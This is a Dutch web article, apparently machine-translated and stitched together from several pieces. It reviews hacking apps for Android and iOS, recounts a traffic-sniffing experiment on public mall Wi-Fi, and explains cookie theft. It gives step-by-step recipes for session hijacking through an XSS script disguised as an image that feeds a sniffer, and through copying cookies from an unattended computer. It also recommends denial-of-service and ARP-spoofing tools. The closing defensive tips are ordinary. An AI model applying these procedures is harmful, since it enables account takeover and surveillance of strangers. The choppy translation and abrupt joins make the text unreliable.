Hoe cookies te stelen via wifi. Methoden voor het stelen van cookies. Gegevens in andere programma's opsnuiven

“Een smartphone met hacktools? Dat bestaat niet”, zouden we jullie onlangs hebben verteld. Het was mogelijk om enkele van de gebruikelijke tools voor het uitvoeren van aanvallen alleen op sommige Maemo's te lanceren. Nu zijn veel bekende tools geporteerd naar iOS en Android, en sommige hacktools zijn speciaal geschreven voor de mobiele omgeving. Kan een smartphone een laptop vervangen bij penetratietesten? We besloten het uit te zoeken.

ANDROID

Android is een populair platform, niet alleen voor gewone stervelingen, maar ook voor de juiste mensen. Het aantal nuttige ][-hulpprogramma's is hier eenvoudigweg buiten de hitlijsten. Hiervoor kunnen we de UNIX-wortels van het systeem bedanken - dit heeft de portering van veel tools naar Android enorm vereenvoudigd. Helaas staat Google sommige ervan niet toe in de Play Store, dus je zult de bijbehorende APK handmatig moeten installeren. Bovendien vereisen sommige hulpprogramma's maximale toegang tot het systeem (bijvoorbeeld de iptables-firewall), dus u moet vooraf voor root-toegang zorgen. Elke fabrikant gebruikt hier zijn eigen technologie, maar het vinden van de benodigde instructies is vrij eenvoudig. Een goede set HOWTO's is samengesteld door de LifeHacker-bron (bit.ly/eWgDlu). Als u hier echter geen model kunt vinden, komt het XDA-Developers-forum (www.xda-developers.com) altijd te hulp, waar u diverse informatie kunt vinden over vrijwel elk model Android-telefoon. Op de een of andere manier zullen sommige van de hieronder beschreven hulpprogramma's werken zonder root-toegang.

Laten we de beoordeling beginnen met een ongebruikelijke pakketbeheerder. De ontwikkelaars noemen het ‘hulpprogramma’s voor superusers’, en dit is niet ver bezijden de waarheid. Na het installeren van BotBrew ontvangt u een repository van waaruit u een groot aantal bekende tools kunt downloaden die voor Android zijn samengesteld. Onder hen: Python- en Ruby-interpreters voor het uitvoeren van talloze tools die erin zijn geschreven, een tcpdump-sniffer en een Nmap-scanner voor netwerkanalyse, Git en Subversion voor het werken met versiecontrolesystemen, en nog veel meer.

Netwerkscanners

Een onopvallende smartphone, die, in tegenstelling tot een laptop, gemakkelijk in een zak past en nooit argwaan wekt, kan handig zijn voor netwerkverkenning. We hebben hierboven al gezegd hoe je Nmap kunt installeren, maar er is nog een andere optie. PIPS is een port van de Nmap-scanner die speciaal is aangepast voor Android, zij het een niet-officiële. Dit betekent dat u snel actieve apparaten op het netwerk kunt vinden, hun besturingssysteem kunt bepalen met behulp van vingerafdrukopties, een poortscan kunt uitvoeren - kortom, alles kunt doen waartoe Nmap in staat is.

Er zijn twee problemen met het gebruik van Nmap, ondanks al zijn kracht. Ten eerste worden de scanparameters verzonden via starttoetsen, die u niet alleen moet kennen, maar ook moet kunnen invoeren met een onhandig mobiel toetsenbord. En ten tweede zijn de scanresultaten in de console-uitvoer niet zo duidelijk als we zouden willen. De Fing-scanner heeft deze tekortkomingen niet; hij scant zeer snel het netwerk, voert vingerafdrukken uit en geeft vervolgens in een duidelijke vorm een ​​lijst weer van alle beschikbare apparaten, onderverdeeld naar type (router, desktop, iPhone, enzovoort). Tegelijkertijd kunt u voor elke host snel een lijst met open poorten bekijken. Bovendien kunt u vanaf hier verbinding maken met bijvoorbeeld FTP, met behulp van de FTP-client die in het systeem is geïnstalleerd - erg handig.

Als het gaat om het analyseren van een specifieke host, kan het NetAudit-hulpprogramma onmisbaar zijn. Het werkt op elk Android-apparaat (zelfs niet-geroot) en stelt u niet alleen in staat apparaten op het netwerk snel te identificeren, maar ook om ze te onderzoeken met behulp van een grote vingerafdrukdatabase om het besturingssysteem te bepalen, evenals CMS-systemen die op internet worden gebruikt server. Er zijn nu meer dan 3.000 digitale vingerafdrukken in de database.

Als u daarentegen op een lager niveau moet werken en de werking van het netwerk zorgvuldig moet onderzoeken, dan kunt u niet zonder Net Tools. Dit is een onmisbare set hulpprogramma's voor het werk van een systeembeheerder, waarmee u de werking van het netwerk waarmee het apparaat is verbonden volledig kunt diagnosticeren. Het pakket bevat meer dan 15 verschillende soorten programma's, zoals ping, traceroute, arp, dns, netstat, route.

Verkeersmanipulatie

De op tcpdump gebaseerde sniffer logt eerlijk alle gegevens in een pcap-bestand, dat vervolgens kan worden bestudeerd met behulp van bekende hulpprogramma's zoals Wireshark of Network Miner. Omdat er geen mogelijkheden voor MITM-aanvallen in zijn geïmplementeerd, is het eerder een hulpmiddel voor het analyseren van uw verkeer. Dit is bijvoorbeeld een geweldige manier om te bestuderen welke programma's die op uw apparaat zijn geïnstalleerd vanuit dubieuze repository's worden verzonden.

Als we het hebben over gevechtsapplicaties voor Android, dan is FaceNiff een van de meest sensationele, die onderschepping en injectie implementeert in onderschepte websessies. Door het APK-pakket met het programma te downloaden, kunt u deze hacktool op vrijwel elke Android-smartphone uitvoeren en, door verbinding te maken met een draadloos netwerk, accounts van verschillende services onderscheppen: Facebook, Twitter, VKontakte, enzovoort - meer dan tien in totaal. Sessiekaping wordt uitgevoerd met behulp van de ARP-spoofing-aanval, maar de aanval is alleen mogelijk op onbeveiligde verbindingen (FaceNiff kan niet in SSL-verkeer terechtkomen). Om de stroom scriptdis te beteugelen, heeft de auteur het maximale aantal sessies beperkt tot drie - daarna moet je contact opnemen met de ontwikkelaar voor een speciale activeringscode.

Als de maker van FaceNiff geld wil voor het gebruik ervan, dan is DroidSheep een volledig gratis tool met dezelfde functionaliteit. Het is waar dat je de distributiekit niet op de officiële website zult vinden (dit komt door de strenge Duitse wetten met betrekking tot beveiligingshulpprogramma's), maar deze is zonder problemen op internet te vinden. De hoofdtaak van het hulpprogramma is het onderscheppen van gebruikerswebsessies van populaire sociale netwerken, geïmplementeerd met behulp van dezelfde ARP-spoofing. Maar er is een probleem met beveiligde verbindingen: net als FaceNiff weigert DroidSheep botweg te werken met het HTTPS-protocol.

Dit hulpprogramma demonstreert ook de onveiligheid van open draadloze netwerken, maar op een iets ander niveau. Het onderschept geen gebruikerssessies, maar laat HTTP-verkeer door zichzelf gaan met behulp van een spoofing-aanval, waarbij er specifieke manipulaties mee worden uitgevoerd. Beginnend met gewone grappen (het vervangen van alle afbeeldingen op de site door trollengezichten, het omdraaien van alle afbeeldingen of, bijvoorbeeld, het vervangen van Google-resultaten) en eindigend met phishing-aanvallen, wanneer de gebruiker valse pagina's te zien krijgt van populaire diensten als facebook.com, linkedin.com, vkontakte.ru en vele anderen.

Als je vraagt ​​welk hackprogramma voor Android het krachtigst is, dan heeft Anti waarschijnlijk geen concurrenten. Dit is een echte hackercombinatie. De hoofdtaak van het programma is het scannen van de netwerkperimeter. Vervolgens gaan verschillende modules de strijd aan, met behulp waarvan een heel arsenaal wordt geïmplementeerd: denk hierbij aan het afluisteren van verkeer, het uitvoeren van MITM-aanvallen en het exploiteren van gevonden kwetsbaarheden. Toegegeven, er zijn ook nadelen. Het eerste dat opvalt is dat de exploitatie van kwetsbaarheden alleen wordt uitgevoerd vanaf de centrale programmaserver, die zich op internet bevindt, waardoor u doelen kunt vergeten die geen extern IP-adres hebben.

Verkeerstunneling

De bekende bestandsbeheerder is nu op smartphones! Net als in de desktopversie is er een systeem van plug-ins om verbinding te maken met verschillende netwerkmappen, evenals een canonieke modus met twee panelen - vooral handig op tablets.

Oké, maar hoe kun je de veiligheid garanderen van je gegevens die via een open draadloos netwerk worden verzonden? Naast VPN, dat Android standaard ondersteunt, kun je een SSH-tunnel maken. Voor dit doel is er een prachtig SSH Tunnel-hulpprogramma, waarmee u het verkeer van geselecteerde applicaties of het hele systeem als geheel via een externe SSH-server kunt routeren.

Het is vaak nodig om verkeer via een proxy of sox te sturen, en in dit geval zal ProxyDroid helpen. Het is eenvoudig: u kiest welk applicatieverkeer u wilt tunnelen en specificeert een proxy (HTTP/HTTPS/SOCKS4/SOCKS5 worden ondersteund). Als autorisatie vereist is, ondersteunt ProxyDroid dit ook. Overigens kan de configuratie aan een specifiek draadloos netwerk worden gekoppeld door voor elk daarvan verschillende instellingen te maken.

Draadloze netwerken

De ingebouwde draadloze netwerkbeheerder is niet erg informatief. Als u snel een compleet beeld wilt krijgen van toegangspunten in de buurt, dan is het hulpprogramma Wifi Analyzer een uitstekende keuze. Het toont niet alleen alle nabijgelegen toegangspunten, maar ook het kanaal waarop ze werken, hun MAC-adres en, belangrijker nog, het gebruikte type codering (na het zien van de felbegeerde letters “WEP”, kunnen we ervan uitgaan dat toegang tot de beveiligd netwerk is aanwezig). Bovendien is het hulpprogramma ideaal als u wilt weten waar het gewenste toegangspunt zich fysiek bevindt, dankzij een visuele signaalsterkte-indicator.

Dit hulpprogramma kan, zoals de ontwikkelaar stelt, nuttig zijn wanneer het draadloze netwerk vol zit met clients die het hele kanaal gebruiken, en op dit moment is een goede verbinding en een stabiele verbinding nodig. Met WiFiKill kunt u klanten selectief of op basis van een specifiek criterium de verbinding met internet verbreken (het is bijvoorbeeld mogelijk om alle Yabloko-leden voor de gek te houden). Het programma voert eenvoudigweg een ARP-spoofing-aanval uit en stuurt alle clients naar zichzelf om. Dit algoritme is dom genoeg eenvoudigweg geïmplementeerd op basis van iptables. Dit is het bedieningspaneel voor draadloze fastfoodnetwerken :).

Audit van webapplicaties

Het manipuleren van HTTP-verzoeken vanaf een computer is een fluitje van een cent; hiervoor zijn een groot aantal hulpprogramma's en browserplug-ins beschikbaar. In het geval van een smartphone is alles iets ingewikkelder. HTTP Query Builder helpt u bij het verzenden van een aangepast HTTP-verzoek met de parameters die u nodig heeft, bijvoorbeeld de gewenste cookie of een gewijzigde User-Agent. Het resultaat van het verzoek wordt weergegeven in een standaardbrowser.

Als de site met een wachtwoord is beveiligd met basistoegangsauthenticatie, kunt u de betrouwbaarheid ervan controleren met het hulpprogramma Router Brute Force ADS 2. Aanvankelijk werd het hulpprogramma gemaakt om wachtwoorden bruut af te dwingen op het beheerderspaneel van de router, maar het is duidelijk dat dit mogelijk is gebruikt tegen andere bronnen met vergelijkbare bescherming. Het hulpprogramma werkt, maar is duidelijk grof. De ontwikkelaar voorziet bijvoorbeeld niet in brute kracht, maar alleen in brute kracht met behulp van een woordenboek.

Je hebt vast wel eens gehoord van zo'n sensationeel programma voor het uitschakelen van webservers als Slowloris. Het principe van de werking ervan is het creëren en behouden van het maximale aantal verbindingen met een externe webserver, waardoor wordt voorkomen dat nieuwe clients er verbinding mee maken. AnDOSid is dus een analoog van Slowloris, rechtstreeks op je Android-apparaat! Ik zal je een geheim vertellen: tweehonderd verbindingen zijn genoeg om een ​​onstabiele werking te garanderen van elke vierde website waarop de Apache-webserver draait. En dit alles - vanaf je telefoon!

Diverse nutsvoorzieningen

Bij het werken met veel webapplicaties en het analyseren van hun logica, is het vrij gebruikelijk om gegevens tegen te komen die in gecodeerde vorm worden verzonden, namelijk Base64. Encode helpt u deze gegevens te decoderen en te zien wat er precies in is opgeslagen. Misschien krijgt u, door aanhalingstekens te vervangen, ze terug te coderen in Base64 en ze te vervangen in de URL van de site die u onderzoekt, de felbegeerde databasequeryfout.

Als je een hexadecimale editor nodig hebt, dan is er ook een voor Android. Met HexEditor kunt u alle bestanden bewerken, inclusief systeembestanden, als u de rechten van het programma verhoogt tot superuser. Een uitstekende vervanger voor een standaard teksteditor, waardoor u eenvoudig het gewenste stuk tekst kunt vinden en wijzigen.

Toegang op afstand

Zodra u toegang heeft tot een externe host, moet u deze kunnen gebruiken. En daarvoor hebben we klanten nodig. Laten we beginnen met SSH, waar ConnectBot al de de facto standaard is. Naast een handige interface biedt het de mogelijkheid om beveiligde tunnels te organiseren via SSH-verbindingen.

Een handig programma waarmee u via RDP- of VNC-services verbinding kunt maken met een extern bureaublad. Ik ben erg blij dat dit twee clients in één zijn; het is niet nodig om verschillende tools voor RDP en VNC te gebruiken.

Een speciaal voor Android geschreven MIB-browser, waarmee je netwerkapparaten kunt beheren via het SNMP-protocol. Het kan handig zijn voor het ontwikkelen van een aanvalsvector op verschillende routers, omdat de standaard community-string (dat wil zeggen een toegangswachtwoord) voor beheer via SNMP nog niet is geannuleerd.

iOS

Het iOS-platform is niet minder populair onder ontwikkelaars van beveiligingshulpprogramma's. Maar als in het geval van Android rootrechten alleen voor sommige applicaties nodig waren, dan is jailbreak op Apple-apparaten bijna altijd vereist. Gelukkig is er zelfs voor de nieuwste iDevices-firmware (5.1.1) al een jailbreaktool. Naast volledige toegang krijgt u ook een alternatieve applicatiebeheerder, Cydia, die al veel hulpprogramma's bevat.

Werken met het systeem

Het eerste waar ik mee wil beginnen is het installeren van de terminal. Om voor de hand liggende redenen is het niet opgenomen in het standaard mobiele OS-pakket, maar we hebben het nodig om consolehulpprogramma's uit te voeren, wat we verder zullen bespreken. De beste implementatie van een terminalemulator is MobileTerminal - het ondersteunt meerdere terminals, besturingsgebaren (bijvoorbeeld voor het verzenden van Control-C) en is over het algemeen indrukwekkend in zijn doordachtheid.

Een andere, complexere optie om toegang te krijgen tot de console van het apparaat is om OpenSSH erop te installeren (dit gebeurt via Cydia) en er lokaal verbinding mee te maken via een SSH-client. Als u de juiste client zoals iSSH gebruikt, die een geweldige touchscreenbediening heeft, dan is deze methode zelfs handiger dan het gebruik van MobileTerminal.

Onderschepping van gegevens

Nu u toegang heeft tot de console, kunt u de hulpprogramma's proberen. Laten we beginnen met Pirni, dat de geschiedenis inging als een volwaardige sniffer voor iOS. Helaas kan de structureel beperkte Wi-Fi-module die in het apparaat is ingebouwd niet worden overgeschakeld naar de promiscue modus die nodig is voor normale gegevensonderschepping. Om gegevens te onderscheppen, wordt dus gebruik gemaakt van klassieke ARP-spoofing, met behulp waarvan al het verkeer via het apparaat zelf wordt doorgegeven. De standaardversie van het hulpprogramma wordt gestart vanaf de console, waar, naast de MITM-aanvalsparameters, de naam van het PCAP-bestand wordt opgegeven, waarin al het verkeer wordt geregistreerd. Het hulpprogramma heeft een meer geavanceerde versie: Pirni Pro, die over een grafische interface beschikt. Bovendien kan het HTTP-verkeer on-the-fly parseren en er zelfs automatisch interessante gegevens uit extraheren (bijvoorbeeld logins en wachtwoorden), met behulp van reguliere expressies die in de instellingen zijn gespecificeerd.

De bekende sniffer Intercepter-NG, waar we al meerdere keren over schreven, heeft sinds kort een consoleversie. Zoals de auteur zegt, is het grootste deel van de code geschreven in pure ANSI C, dat zich in vrijwel elke omgeving hetzelfde gedraagt, dus de consoleversie werkte vanaf het allereerste begin zowel op desktop Windows, Linux en BSD, als op mobiele platforms, waaronder iOS en Android. De consoleversie implementeert al het verzamelen van wachtwoorden die via verschillende protocollen worden verzonden, het onderscheppen van instant messenger-berichten (ICQ/Jabber en vele andere), en het herstellen van bestanden uit verkeer (HTTP/FTP/IMAP/POP3/SMTP/SMB). Tegelijkertijd zijn netwerkscanfuncties en hoogwaardige ARP Poison beschikbaar. Voor een correcte werking moet je eerst het libpcap-pakket installeren via Cydia (vergeet niet om ontwikkelingspakketten in de instellingen in te schakelen). Alle opstartinstructies komen neer op het instellen van de juiste rechten: chmod +x intercepter_ios. Als u vervolgens de sniffer zonder parameters uitvoert, verschijnt er een duidelijke interactieve Itercepter-interface, waarmee u eventuele aanvallen kunt lanceren.

Het is moeilijk te geloven, maar deze geavanceerde tool voor het implementeren van MITM-aanvallen is eindelijk overgezet naar iOS. Na enorm veel werk zijn we erin geslaagd een volwaardige mobiele poort te maken. Om jezelf te behoeden voor het dansen met een tamboerijn rond afhankelijkheden tijdens zelfcompilatie, is het beter om een ​​reeds gebouwd pakket te installeren met behulp van Cydia, na het toevoegen van theworm.altervista.org/cydia (TWRepo-repository) als gegevensbron. De kit bevat ook het etterlog-hulpprogramma, dat helpt bij het extraheren van verschillende soorten nuttige informatie uit de verzamelde verkeersdump (bijvoorbeeld FTP-toegangsaccounts).

Draadloze netwerkanalyse

In oudere versies van iOS draaiden vakmensen aircrack en konden ze de WEP-sleutel breken, maar we controleerden: het programma werkt niet op nieuwe apparaten. Om Wi-Fi te bestuderen zullen we daarom tevreden moeten zijn met alleen Wi-Fi-scanners. WiFi Analyzer analyseert en geeft informatie weer over alle beschikbare 802.11-netwerken om u heen, inclusief informatie over SSID, kanalen, leveranciers, MAC-adressen en coderingstypen. Het hulpprogramma bouwt in realtime visuele grafieken op basis van de gegevens die in de ether aanwezig zijn. Met zo'n programma is het gemakkelijk om de fysieke locatie van het punt te vinden als je het plotseling vergeet, en bijvoorbeeld naar de WPS-PIN te kijken, wat handig kan zijn voor het verbinden.

Netwerkscanners

Welk programma gebruikt een penetratietester waar ook ter wereld, ongeacht de doelen en doelstellingen? Netwerkscanner. En in het geval van iOS zal dit hoogstwaarschijnlijk de krachtigste Scany-toolkit zijn. Dankzij een set ingebouwde hulpprogramma's krijg je snel een gedetailleerd beeld van netwerkapparaten en bijvoorbeeld open poorten. Bovendien bevat het pakket netwerktesthulpprogramma's zoals ping, traceroute en nslookup.

Veel mensen geven echter de voorkeur aan Fing. De scanner heeft een vrij eenvoudige en beperkte functionaliteit, maar is voldoende voor de eerste kennismaking met het netwerk van bijvoorbeeld een cafetaria :). De resultaten geven informatie weer over beschikbare services op externe machines, MAC-adressen en hostnamen die zijn verbonden met het gescande netwerk.

Het lijkt erop dat iedereen Nikto is vergeten, maar waarom? Deze webkwetsbaarheidsscanner, geschreven in een scripttaal (namelijk Perl), installeert u immers eenvoudig via Cydia. Dit betekent dat u het eenvoudig vanaf de terminal op uw gejailbreakte apparaat kunt starten. Nikto geeft u graag aanvullende informatie over de geteste webbron. Bovendien kunt u uw eigen zoekhandtekeningen met uw eigen handen aan de kennisdatabase toevoegen.

Deze krachtige tool voor het automatisch misbruiken van SQL-kwetsbaarheden is geschreven in Python, wat betekent dat zodra u de interpreter installeert, u deze eenvoudig rechtstreeks vanaf uw mobiele apparaat kunt gebruiken.

Afstandsbediening

Veel netwerkapparaten (inclusief dure routers) worden beheerd met behulp van het SNMP-protocol. Met dit hulpprogramma kunt u subnetten scannen op beschikbare SNMP-services met vooraf bekende community-tekenreekswaarden (met andere woorden, standaardwachtwoorden). Houd er rekening mee dat het zoeken naar SNMP-services met standaard communitystrings (openbaar/privaat) in een poging toegang te krijgen tot apparaatbeheer een integraal onderdeel is van elke penetratietest, samen met het identificeren van de perimeter zelf en het identificeren van services.

Twee hulpprogramma's van dezelfde fabrikant zijn ontworpen om verbinding te maken met een extern bureaublad met behulp van de RDP- en VNC-protocollen. Er zijn veel vergelijkbare hulpprogramma's in de App Store, maar deze zijn vooral gemakkelijk te gebruiken.

Wachtwoordherstel

Het legendarische programma dat miljoenen hackers over de hele wereld helpt hun wachtwoord te ‘onthouden’, is geporteerd naar iOS. Nu kunt u rechtstreeks vanaf uw iPhone naar wachtwoorden zoeken voor diensten zoals HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 en vele andere. Het is waar dat het voor een effectievere aanval beter is om goede brute force-woordenboeken in te slaan.

Iedereen kent uit de eerste hand de kwetsbaarheid van het gebruik van standaardwachtwoorden. Pass Mule is een soort directory die allerlei standaard logins en wachtwoorden voor netwerkapparaten bevat. Ze zijn handig geordend op naam van de leverancier, product en model, zodat het niet moeilijk zal zijn om degene te vinden die u nodig heeft. Het programma is eerder ontworpen om tijd te besparen bij het zoeken naar een handleiding voor de router, de standaard login en het wachtwoord die u moet achterhalen.

Het exploiteren van kwetsbaarheden

Het is moeilijk om je een beter hackprogramma voor te stellen dan Metasploit, en dat is wat onze recensie van vandaag concludeert. Metasploit is een pakket van verschillende tools met als hoofdtaak het misbruiken van kwetsbaarheden in software. Stel je voor: ongeveer 1000 betrouwbare, bewezen en noodzakelijke exploits in het dagelijks leven van een pentester - direct op je smartphone! Met behulp van zo'n tool kun je je echt in elk netwerk vestigen. Metasploit stelt u niet alleen in staat om fouten in serverapplicaties te misbruiken; er zijn ook tools beschikbaar om clientapplicaties aan te vallen (bijvoorbeeld via de Browser Autopwn-module, wanneer een gevechtslading in clientverkeer wordt ingevoegd). Hierbij moet gezegd worden dat er geen mobiele versie van de toolkit bestaat, maar je kunt wel een standaardpakket op een Apple-apparaat installeren met behulp van .

Internetgebruikers zijn zo onzorgvuldig dat het verliezen van vertrouwelijke gegevens net zo eenvoudig is als het pellen van peren. De publicatie 42.tut voerde een experiment uit om te laten zien hoeveel ‘gaten’ er in openbare Wi-Fi-netwerken zitten. De conclusie is teleurstellend: iedereen zonder speciale vaardigheden en kennis kan een compleet dossier over een persoon aanmaken met alleen een open draadloos netwerk.

Voor het experiment hebben we verschillende applicaties geïnstalleerd. Ze verschillen qua functionaliteit, maar hun essentie is hetzelfde: alles verzamelen wat via het netwerk gaat waarmee het apparaat is verbonden. Geen van de programma's positioneert zichzelf als 'piraat', 'hacker' of illegaal - ze kunnen zonder problemen online worden gedownload. Het experiment werd uitgevoerd in een winkelcentrum met gratis wifi.

Onderschepping

We maken verbinding met wifi: er is geen wachtwoord, de naam van het netwerk bevat het woord “gratis”. We beginnen met scannen, een van de programma's vindt meteen 15 verbindingen met het netwerk. Voor iedereen kun je het IP-adres zien, het MAC-adres, voor sommigen de naam van de fabrikant van het apparaat: Sony, Samsung, Apple, LG, HTC...

Tussen de apparaten vinden we de ‘slachtoffer’-laptop. We maken er verbinding mee - gegevens die door het netwerk gaan, verschijnen op het scherm. Alle informatie is op tijd gestructureerd; er is zelfs een ingebouwde viewer voor onderschepte gegevens.

Gebruikersidentificatie

Wij blijven kijken. Op de laptop van zijn partner is duidelijk een online game begonnen: programmaopdrachten worden voortdurend naar het netwerk verzonden, informatie over de situatie op het slagveld wordt ontvangen. Je kunt de bijnamen van je tegenstanders, hun spelniveaus en nog veel meer zien.

Er komt een bericht binnen van "VKontakte". In een van de gedetailleerde berichtspecificaties zien we dat de gebruikers-ID in elk ervan zichtbaar is. Als je het in de browser plakt, wordt het account geopend van de persoon die het bericht heeft ontvangen.

Het ‘slachtoffer’ schrijft op dit moment een reactie op het bericht en heeft duidelijk geen idee dat wij met alle macht naar de foto’s op zijn account zitten te staren. Een van de sociale netwerkapplicaties geeft een signaal - we kunnen naar dit geluid luisteren in de speler.

Wachtwoorden en berichten

Foto's en geluiden zijn niet het enige dat kan worden "overgezet" naar de beschikbare Wi-Fi. Een van de programma's heeft bijvoorbeeld een apart tabblad om correspondentie op sociale netwerken en instant messengers bij te houden. Berichten worden gedecodeerd en gesorteerd op tijdstip van verzending.

Het tonen van de correspondentie van iemand anders gaat verder dan goed en kwaad. Maar het werkt. Ter illustratie is hier een deel van de dialoog van de auteur van de tekst, opgevangen door de volgcomputer van het ‘slachtoffer’-apparaat.

Een ander programma “slaat” alle cookies en gebruikersinformatie afzonderlijk op, inclusief wachtwoorden. Gelukkig wel in gecodeerde vorm, maar er wordt meteen aangeboden om een ​​hulpprogramma te installeren dat ze zal decoderen.

Conclusies

Bijna alle informatie kan via Wi-Fi verloren gaan. Veel openbare netwerken bieden helemaal geen bescherming, en soms zelfs een wachtwoord. Dit betekent dat iedereen het verkeer van collega's, vrienden of vreemden kan onderscheppen.

De meest betrouwbare uitweg uit deze situatie is er één: verzend geen belangrijke informatie via openbare netwerken. Stuur bijvoorbeeld geen telefoonnummers en wachtwoorden mee in berichten en betaal niet buitenshuis met een betaalkaart. Het risico op verlies van persoonlijke gegevens is extreem hoog.

Koekjes - informatie in de vorm van een tekstbestand dat door de website op de computer van de gebruiker wordt opgeslagen. Bevat authenticatiegegevens (login/wachtwoord, ID, telefoonnummer, mailboxadres), gebruikersinstellingen, toegangsstatus. Opgeslagen in het browserprofiel.

Cookie-hacking is de diefstal (of “kaping”) van de sessie van een bezoeker van een webbron. Privé-informatie komt niet alleen beschikbaar voor de afzender en ontvanger, maar ook voor een derde partij: de persoon die de onderschepping heeft uitgevoerd.

Tools en technieken voor het hacken van cookies

Computerdieven hebben, net als hun collega's in het echte leven, naast vaardigheden, behendigheid en kennis natuurlijk ook hun eigen gereedschap - een soort arsenaal aan hoofdsleutels en sondes. Laten we eens kijken naar de populairste trucs die hackers gebruiken om cookies van internetgebruikers te extraheren.

Snuffelaars

Speciale programma's voor het monitoren en analyseren van netwerkverkeer. Hun naam komt van het Engelse werkwoord “sniff” (snuiven), omdat. letterlijk “snuffelen” verzonden pakketten tussen knooppunten.

Maar aanvallers gebruiken een sniffer om sessiegegevens, berichten en andere vertrouwelijke informatie te onderscheppen. Het doelwit van hun aanvallen zijn voornamelijk onbeschermde netwerken, waar cookies worden verzonden in een open HTTP-sessie, dat wil zeggen dat ze vrijwel niet gecodeerd zijn. (Openbare Wi-Fi is in dit opzicht het meest kwetsbaar.)

Om een ​​sniffer in het internetkanaal tussen het gebruikersknooppunt en de webserver in te sluiten, worden de volgende methoden gebruikt:

  • “luisteren” naar netwerkinterfaces (hubs, switches);
  • verkeer vertakken en kopiëren;
  • verbinding maken met een netwerkkanaalopening;
  • analyse door middel van speciale aanvallen die het verkeer van het slachtoffer omleiden naar de sniffer (MAC-spoofing, IP-spoofing).

De afkorting XSS staat voor Cross Site Scripting. Wordt gebruikt om websites aan te vallen om gebruikersgegevens te stelen.

Het principe van XSS is als volgt:

  • een aanvaller voegt kwaadaardige code (een speciaal vermomd script) in op een webpagina van een website, forum of in een bericht (bijvoorbeeld wanneer hij correspondeert op een sociaal netwerk);
  • het slachtoffer gaat naar de geïnfecteerde pagina en activeert de geïnstalleerde code op zijn pc (klikt, volgt een link, enz.);
  • op zijn beurt ‘extraheert’ de uitgevoerde kwaadaardige code de vertrouwelijke gegevens van de gebruiker uit de browser (met name cookies) en stuurt deze naar de webserver van de aanvaller.

Om een ​​software-XSS-mechanisme te ‘implanteren’ maken hackers gebruik van allerlei kwetsbaarheden in webservers, online diensten en browsers.

Alle XSS-kwetsbaarheden zijn onderverdeeld in twee typen:

  • Passief. De aanval wordt verkregen door een specifiek script op een webpagina op te vragen. Schadelijke code kan in verschillende vormen op een webpagina worden geïnjecteerd (bijvoorbeeld in de zoekbalk van de site). Het meest vatbaar voor passieve XSS zijn bronnen die geen HTML-tags filteren wanneer gegevens binnenkomen;
  • Actief. Staat direct op de server. En ze worden geactiveerd in de browser van het slachtoffer. Ze worden actief gebruikt door oplichters in allerlei blogs, chats en nieuwsfeeds.

Hackers ‘camoufleren’ hun XSS-scripts zorgvuldig, zodat het slachtoffer niets vermoedt. Ze veranderen de bestandsextensie, geven de code door als een afbeelding, motiveren ze om de link te volgen en trekken ze aan met interessante inhoud. Het resultaat: een pc-gebruiker, die zijn eigen nieuwsgierigheid niet kan beheersen, stuurt met zijn eigen hand (met een muisklik) sessiecookies (met login en wachtwoord!) naar de auteur van het XSS-script - de computerschurk.

Vervanging van cookies

Alle cookies worden zonder enige wijziging opgeslagen en naar de webserver (waar ze “afkwamen”) verzonden – in hun oorspronkelijke vorm – met dezelfde waarden, strings en andere gegevens. Het opzettelijk wijzigen van hun parameters wordt cookievervanging genoemd. Met andere woorden: bij het vervangen van cookies doet de aanvaller alsof hij wensdenken is. Wanneer u bijvoorbeeld een betaling doet in een online winkel, verandert de cookie het betalingsbedrag naar beneden - er wordt dus “bespaard” op aankopen.

Gestolen sessiecookies op een sociaal netwerk van het account van iemand anders worden in een andere sessie en op een andere pc ‘ingevoegd’. De eigenaar van de gestolen cookies krijgt volledige toegang tot het account van het slachtoffer (correspondentie, inhoud, pagina-instellingen) zolang ze op haar pagina is.

“Bewerken” cookies worden uitgevoerd met behulp van:

  • “Cookies beheren...”-functies in de Opera-browser;
  • Cookies Manager en Advanced Cookie Manager add-ons voor FireFox;
  • IECookiesView-hulpprogramma's (alleen Internet Explorer);
  • een teksteditor zoals AkelPad, NotePad of Windows Notepad.

Fysieke toegang tot gegevens

Een zeer eenvoudig implementatieschema, bestaande uit verschillende stappen. Maar het is alleen effectief als de computer van het slachtoffer met een open sessie, bijvoorbeeld VKontakte, onbeheerd wordt achtergelaten (en voor een lange tijd!):

  1. Er wordt een javascript-functie in de adresbalk van de browser ingevoerd om alle opgeslagen cookies weer te geven.
  2. Nadat u op “ENTER” heeft gedrukt, verschijnen ze allemaal op de pagina.
  3. Cookies worden gekopieerd, opgeslagen in een bestand en vervolgens overgebracht naar een flashstation.
  4. Op een andere pc worden cookies bij een nieuwe sessie vervangen.
  5. Er wordt toegang verleend tot de account van het slachtoffer.

In de regel gebruiken hackers de bovenstaande tools (+ andere) zowel in combinatie (aangezien het beschermingsniveau op veel webbronnen vrij hoog is) als afzonderlijk (wanneer gebruikers buitensporig naïef zijn).

XSS + snuffelaar

  1. Er wordt een XSS-script gemaakt dat het adres van een online sniffer specificeert (zelfgemaakt of een specifieke dienst).
  2. De kwaadaardige code wordt opgeslagen met de extensie .img (afbeeldingsformaat).
  3. Dit bestand wordt vervolgens geüpload naar een websitepagina, chat of persoonlijk bericht, waar de aanval zal worden uitgevoerd.
  4. De aandacht van de gebruiker wordt gevestigd op de gecreëerde “valstrik” (dit is waar social engineering van kracht wordt).
  5. Als de valstrik wordt geactiveerd, worden de cookies uit de browser van het slachtoffer onderschept door de sniffer.
  6. De aanvaller opent de snifferlogboeken en haalt de gestolen cookies op.
  7. Vervolgens voert het een vervanging uit om de rechten van de accounteigenaar te verkrijgen met behulp van de bovenstaande tools.

Cookies beschermen tegen hacking

  1. Gebruik een gecodeerde verbinding (met behulp van de juiste protocollen en beveiligingsmethoden).
  2. Reageer niet op dubieuze links, afbeeldingen of verleidelijke aanbiedingen om vertrouwd te raken met ‘nieuwe gratis software’. Vooral van vreemden.
  3. Gebruik alleen vertrouwde webbronnen.
  4. Beëindig de geautoriseerde sessie door op de knop “Uitloggen” te klikken (niet alleen door het tabblad te sluiten!). Vooral als u niet vanaf een pc bent ingelogd op uw account, maar bijvoorbeeld vanaf een pc in een internetcafé.
  5. Maak geen gebruik van de functie 'Wachtwoord opslaan' van de browser. Opgeslagen registratiegegevens verhogen de kans op diefstal aanzienlijk. Wees niet lui, verspil geen enkele minuten tijd door uw wachtwoord in te voeren en aan het begin van elke sessie in te loggen.
